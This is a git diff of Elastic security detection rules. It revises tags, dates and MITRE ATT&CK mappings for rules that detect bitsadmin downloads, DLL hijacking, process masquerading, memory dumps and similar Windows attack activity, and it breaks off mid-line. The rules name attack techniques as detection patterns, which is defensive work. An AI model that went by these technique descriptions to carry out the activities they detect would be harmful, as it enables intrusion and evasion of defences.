+3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -207,26 +207,34 @@ value = "?:\\\\Program Files\\\\Azure\\\\StorageSyncAgent\\\\AFSDiag.ps1" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" -[[rule.threat.technique.subtechnique]] -id = "T1560.001" -name = "Archive via Utility" -reference = "https://attack.mitre.org/techniques/T1560/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1560.002" -name = "Archive via Library" -reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml index 07bb5150945..3952b06069b 100644 --- a/rules_building_block/command_and_control_bitsadmin_activity.toml +++ b/rules_building_block/command_and_control_bitsadmin_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -26,7 +26,17 @@ name = "Bitsadmin Activity" risk_score = 21 rule_id = "8eec4df1-4b4b-4502-b6c3-c788714604c9" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Rule Type: BBR", "Data Source: Sysmon", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Rule Type: BBR", + "Data Source: Sysmon", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs", +] timestamp_override = "event.ingested" type = "eql" @@ -47,26 +57,38 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml index f135e42a29f..5701fe075a7 100644 --- a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml +++ b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/09" [rule] author = ["Elastic"] @@ -26,7 +26,18 @@ references = [ risk_score = 21 rule_id = "e9a3b2c1-d4f5-6789-0abc-def123456789" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Initial Access", "Data Source: Elastic Defend", "Domain: LLM", "Mitre Atlas: T0010.003", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Domain: LLM", + "Mitre Atlas: T0010.003", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -45,49 +56,31 @@ network where event.action == "lookup_requested" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0012" -name = "Valid Accounts" -reference = "https://atlas.mitre.org/techniques/AML.T0012/" - -[rule.threat.tactic] -id = "AML.TA0004" -name = "Initial Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0004/" diff --git a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml index 9ec279e6d2c..74f8692331c 100644 --- a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml +++ b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -31,7 +31,19 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Protection", "Use Case: Threat Detection", "Use Case: Identity Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Protection", + "Use Case: Threat Detection", + "Use Case: Identity Threat Detection", + "Tactic: Credential Access", + "Tactic: Initial Access", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -42,17 +54,29 @@ event.dataset:o365.audit and event.code:AadRiskDetection [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" diff --git a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml index 2981a5ea562..6eb634e33de 100644 --- a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml +++ b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/08/18" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -49,18 +49,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml index bef39605f7d..666c28d4f06 100644 --- a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml +++ b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/09/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -20,7 +20,15 @@ name = "Memory Dump File with Unusual Extension" risk_score = 21 rule_id = "c0b9dc99-c696-4779-b086-0d37dc2b3778" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -44,18 +52,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique.subtechnique]] +id = "T1003.001" +name = "LSASS Memory" +reference = "https://attack.mitre.org/techniques/T1003/001/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.008" name = "Masquerade File Type" reference = "https://attack.mitre.org/techniques/T1036/008/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/defense_evasion_dll_hijack.toml b/rules_building_block/defense_evasion_dll_hijack.toml index 9c6d6a93c4a..87e086c3d31 100644 --- a/rules_building_block/defense_evasion_dll_hijack.toml +++ b/rules_building_block/defense_evasion_dll_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/01" [rule] author = ["Elastic"] @@ -83,18 +83,24 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml index 62320b4e83b..79332fc5371 100644 --- a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml +++ b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -40,18 +40,24 @@ sequence by user.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [[rule.threat.technique.subtechnique]] -id = "T1127.002" -name = "ClickOnce" -reference = "https://attack.mitre.org/techniques/T1127/002/" +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/defense_evasion_download_susp_extension.toml b/rules_building_block/defense_evasion_download_susp_extension.toml index 79afd7ac201..0e65e8b4c34 100644 --- a/rules_building_block/defense_evasion_download_susp_extension.toml +++ b/rules_building_block/defense_evasion_download_susp_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -24,7 +24,14 @@ references = [ risk_score = 21 rule_id = "8d366588-cbd6-43ba-95b4-0971c3f906e5" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -54,18 +61,36 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml index b530926ee0b..2eecbdb9c35 100644 --- a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml +++ b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -78,36 +78,26 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" - [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules_building_block/defense_evasion_generic_deletion.toml b/rules_building_block/defense_evasion_generic_deletion.toml index 56910a2be3a..ba036559b71 100644 --- a/rules_building_block/defense_evasion_generic_deletion.toml +++ b/rules_building_block/defense_evasion_generic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -54,23 +54,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" - [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml index 563b76b541a..6d1c96172e8 100644 --- a/rules_building_block/defense_evasion_injection_from_msoffice.toml +++ b/rules_building_block/defense_evasion_injection_from_msoffice.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -21,7 +21,16 @@ name = "Potential Process Injection from Malicious Document" risk_score = 21 rule_id = "1c5a04ae-d034-41bf-b0d8-96439b5cc774" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Tactic: Initial Access", + "Rule Type: BBR", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -43,23 +52,43 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules_building_block/defense_evasion_masquerading_browsers.toml b/rules_building_block/defense_evasion_masquerading_browsers.toml index c86c12b0ea8..cb67a25bd91 100644 --- a/rules_building_block/defense_evasion_masquerading_browsers.toml +++ b/rules_building_block/defense_evasion_masquerading_browsers.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [rule] author = ["Elastic"] @@ -21,7 +21,15 @@ name = "Potential Masquerading as Browser Process" risk_score = 21 rule_id = "5b9eb30f-87d6-45f4-9289-2bf2024f0376" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Defense Evasion", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend", +] timestamp_override = "event.ingested" type = "eql" @@ -161,12 +169,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -177,7 +183,22 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_masquerading_vlc_dll.toml b/rules_building_block/defense_evasion_masquerading_vlc_dll.toml index 9afa0bc4d07..a05035ab822 100644 --- a/rules_building_block/defense_evasion_masquerading_vlc_dll.toml +++ b/rules_building_block/defense_evasion_masquerading_vlc_dll.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/05" [rule] author = ["Elastic"] @@ -21,7 +21,15 @@ name = "Potential Masquerading as VLC DLL" risk_score = 21 rule_id = "4494c14f-5ff8-4ed2-8e99-bf816a1642fc" severity = "low" -tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -37,12 +45,10 @@ library where host.os.type == "windows" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -53,7 +59,22 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_masquerading_windows_dll.toml b/rules_building_block/defense_evasion_masquerading_windows_dll.toml index d237951b5e4..afce0c6f8cd 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_dll.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_dll.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/01" [rule] author = ["Elastic"] @@ -21,7 +21,15 @@ name = "Potential Masquerading as System32 DLL" risk_score = 21 rule_id = "fb01d790-9f74-4e76-97dd-b4b0f7bf6435" severity = "low" -tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -100,12 +108,10 @@ library where event.action == "load" and dll.Ext.relative_file_creation_time <= [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -116,17 +122,37 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml index a27af3e29e5..884c457808b 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/05/05" [rule] author = ["Elastic"] @@ -20,7 +20,15 @@ name = "Potential Masquerading as System32 Executable" risk_score = 21 rule_id = "79ce2c96-72f7-44f9-88ef-60fa1ac2ce47" severity = "low" -tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] +tags = [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "eql" @@ -74,12 +82,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -90,7 +96,22 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml index ee7da379d9e..eb6a59b0199 100644 --- a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml +++ b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -31,7 +31,18 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Purview", "Use Case: Threat Detection", "Use Case: Configuration Auditing", "Rule Type: BBR"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Data Source: Microsoft Purview", + "Use Case: Threat Detection", + "Use Case: Configuration Auditing", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", +] timestamp_override = "event.ingested" type = "query" @@ -43,54 +54,30 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = 